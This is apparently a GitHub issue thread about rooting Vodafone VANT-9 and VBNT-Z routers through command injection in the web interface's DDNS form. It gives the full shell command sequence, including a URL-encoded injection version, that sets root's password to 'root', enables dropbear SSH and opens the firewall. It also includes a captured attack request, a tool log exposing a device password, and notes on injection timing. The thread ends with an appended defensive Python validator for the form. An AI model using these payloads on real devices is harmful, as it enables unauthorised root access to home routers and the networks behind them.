Comments (4)
Line: variant=DGA0130VDF Vodafone 17.1.7988 (root) Advanced DDNS,AdvancedDDNS,www.DynDNS.org,sleep 30;
mainscript host: 192.168.1.1
mainscript username: b'vodafone'
mainscript password: b'fxXfjhUwENKn'
mainscript flashFirmware: 0
mainscript upgradeFilename:
mainscript flashSleepDelay: 120
mainscript activeMethod: AdvancedDDNS
mainscript activeCommand: sleep 30;
mainscript splitCommand: 1
mainscript ddnsService: www.DynDNS.org
mainscript connectRetryDelay: 5
mainscript interCommandDelay: 5
Connect attempt 1
<Response [200]>
Modem up
Authenticating
Authentication failed, debug values are: ['Got CSRF token: 1e636dfeed589dcd4a6253d6b73bafa7040eb59a19007dc43d3d26fe99470819', "A value b'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'", 'br.response <Response [200]>', "Challenge received: {'error': {'msg': 'failed', 'waitTime': '7', 'wrongCount': '6'}}"]
Exception: <class 'KeyError'>
Exception in Tkinter callback
Traceback (most recent call last):
File "/home/henry/Documents/vodafone hack/exploit/theirs/autoflashgui/libautoflashgui.py", line 37, in srp6authenticate
M = usr.process_challenge(binascii.unhexlify(j['s']), binascii.unhexlify(j['B']))
KeyError: 's'
This is where I'm at currently.
from autoflashgui.
Tested on firmware: RC2.4.6_prod_AUTH_vant-9_17.1.7988-2461009-20180510014336.rbi / 17.1.7988-2461009-CRF846-V2.4.6
The commands needed to root, bring up dropbear and allow SSH through the firewall:
user/pass: root:root, with a loopback char of Y. You could also just look for the success JSON in the response.
sed -i 's#root:/bin/false#root:/bin/ash#' /etc/passwd;echo Y
echo "root:root" | chpasswd;echo Y
uci set dropbear.wan.enable='0';echo Y
uci set dropbear.lan.enable='1';echo Y
uci set dropbear.lan.PasswordAuth=on;echo Y
uci set dropbear.lan.RootPasswordAuth=on;echo Y
uci set dropbear.lan.RootLogin=1;echo Y
uci set firewall.Allow_SSH_Vodafone_lan.target='ACCEPT';echo Y
uci commit;echo Y
echo > /etc/dropbear/authorized_keys;echo Y
/etc/init.d/firewall restart;echo Y
/etc/init.d/dropbear restart;echo Y
sed -i 's/#//' /etc/inittab
Or formatted for injection:
%3Bsed+-i+'s#root:%2Fbin%2Ffalse#root:%2Fbin%2Fash#'+%2Fetc%2Fpasswd%3Becho+Y
%3Becho+"root:root"+|+chpasswd%3Becho+Y
%3Buci+set+dropbear.wan.enable='0'%3Becho+Y
%3Buci+set+dropbear.lan.enable='1'%3Becho+Y
%3Buci+set+dropbear.lan.PasswordAuth=on%3Becho+Y
%3Buci+set+dropbear.lan.RootPasswordAuth=on%3Becho+Y
%3Buci+set+dropbear.lan.RootLogin=1%3Becho+Y
%3Buci+set+firewall.Allow_SSH_Vodafone_lan.target='ACCEPT'%3Becho+Y
%3Buci+commit%3Becho+Y
%3Becho+>+%2Fetc%2Fdropbear%2Fauthorized_keys%3Becho+Y
%3B%2Fetc%2Finit.d%2Ffirewall+restart%3Becho+Y
%3B%2Fetc%2Finit.d%2Fdropbear+restart%3Becho+Y
%3Bsed+-i+'s%2F#%2F%2F'+%2Fetc%2Finittab
I have confirmed these commands can be executed manually and work through the webui on firmware
DDNS Request:
POST http://192.168.1.1/modals/dns-ddns.lp HTTP/1.1
Connection: keep-alive
Content-Length: 232
Accept: */*
Origin: https://192.168.1.1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: https://192.168.1.1/
Accept-Language: en-gb
Cookie: webui_language=en-us; sessionID=d937126e96d3b948ceaff4398b9c329aa00d87342eb9d3b38e832b92df24b719
Host: 192.168.1.1
ddnsStatus=1&ddnsService=dyndns.org&ddnsDomain=test.com&ddnsUsrname=user&ddnsPswrd=pass&securedns=0&action=SAVE&CSRFtoken=a1a717126289a0062708bc3396761d3a4ed94b2b0abdd3b84089bd7de07b46b2
DDNS Response:
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 15 Sep 2019 12:43:50 GMT
Content-Type: application/json
Connection: keep-alive
Content-Security-Policy: default-src 'self';script-src 'self' 'unsafe-eval' 'unsafe-inline';style-src 'self' 'unsafe-inline';
cache-control: no-cache
Content-Language: en-us
X-Frame-Options: SAMEORIGIN
{ "status":"success" }
from autoflashgui.
There is a working fork for VANT-9 here now: https://github.com/jameskeenan295/autoflashgui
but the commands need to be run multiple times to take effect before the ssh shell starts working. So it's still a work in progress.
from autoflashgui.
Did some more testing today and noticed a few interesting points about the rooting process through ddns command injection.
- On VANT-9 and VBNT-Z the commands have a large delay from when the POST is sent before they execute. I observed the delay by posting lots of curl commands and then measured the delta between the timestamps of the POST and the web server logs.
- VANT-9 & VBNT-Z both execute the commands twice for each post to the ddns form. The first executes at +11sec, and the second around +23sec.
- The command length (POST'ed to the ddns form) can exceed 1024 characters (I tested various lengths using curl commands).
- Easiest method is to submit all the commands in one go, with semicolons between them, and then have patience to wait at least 30sec before testing it.
- VBNT-Z uses different ddns and firmware upgrade URLs to VANT-9.
Rooting process is working reliably now for both router models, using default ssh port 22.
To keep things simple for merging the fork back into mswhirl's code later I've removed the http server component of the AFG fork, and updated defaults.ini with two new entries:
DNA0130 Vodafone NZ 17.4.0182-0841014
DGA0130 Vodafone NZ 17.1.7988-2461009-CRF846-V2.4.6
Recommendations are:
Untick the "split the given command on semicolons..." option in the AFG GUI (or set defaultSplitCommand=0 in defaults.ini)
Or: you must use: defaultInterCommandDelay=30
Some other minor changes to libautoflashgui.py:
Added timestamps to all the print commands.
Added additional URLs for firmware flashing VANT-9 & VBNT-Z. The flashing process doesn't work yet through AFG. I just get: 500 Internal Server Error
https://github.com/jameskeenan295/autoflashgui
from autoflashgui.
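As an added example (not code from the autoflashgui thread or project), here is a server-side validator in Python for the DDNS form in the captured POST above; it also covers the length and semicolon-delimiter points in the last comment. The field names come from the request body, while the provider allow-list and the sample bodies are constructed.

```python
import re
from urllib.parse import unquote_plus

# Added example, not code from the autoflashgui thread or project.
# Field names are those in the captured dns-ddns.lp POST body; the provider
# allow-list and the sample bodies below are constructed for the example.

# RFC 1123 hostname: dot-separated labels of letters, digits and hyphens,
# no label starting/ending with a hyphen, 253 characters max overall.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)
ALLOWED_SERVICES = {"dyndns.org", "www.DynDNS.org"}  # constructed allow-list
SHELL_META = set(";|&`$()<>'\"\\ \t\n\r")

# Constructed sample bodies: the benign one mirrors the captured request, the
# other appends one of the thread's ';cmd;echo Y' fragments to the domain field.
BENIGN_BODY = ("ddnsStatus=1&ddnsService=dyndns.org&ddnsDomain=test.com"
               "&ddnsUsrname=user&ddnsPswrd=pass&securedns=0&action=SAVE"
               "&CSRFtoken=CSRF_PLACEHOLDER")
INJECTED_BODY = BENIGN_BODY.replace(
    "ddnsDomain=test.com", "ddnsDomain=test.com%3Buci+commit%3Becho+Y")


def decode_form(body):
    """Decode an x-www-form-urlencoded body into {name: value}. Splitting on '&'
    only (never ';') keeps an injected ';' inside the value where we can see it."""
    fields = {}
    for pair in body.split("&"):
        if pair:
            name, _, value = pair.partition("=")
            fields[unquote_plus(name)] = unquote_plus(value)
    return fields


def validate_ddns_form(body):
    """Return {field: reason} for every field that must be rejected before the
    values reach any config write or shell command; an empty dict means accept."""
    fields = decode_form(body)
    problems = {}
    if fields.get("ddnsService", "") not in ALLOWED_SERVICES:
        problems["ddnsService"] = "not on provider allow-list"
    if not HOSTNAME_RE.match(fields.get("ddnsDomain", "")):
        problems["ddnsDomain"] = "not a valid hostname"
    for name in ("ddnsUsrname", "ddnsPswrd"):
        if any(c in SHELL_META for c in fields.get(name, "")):
            problems[name] = "contains shell metacharacters"
    return problems
```

Rejecting the input is only half of the fix: the accepted values should also be handed to the DDNS client as separate arguments or config keys, never spliced into a shell string.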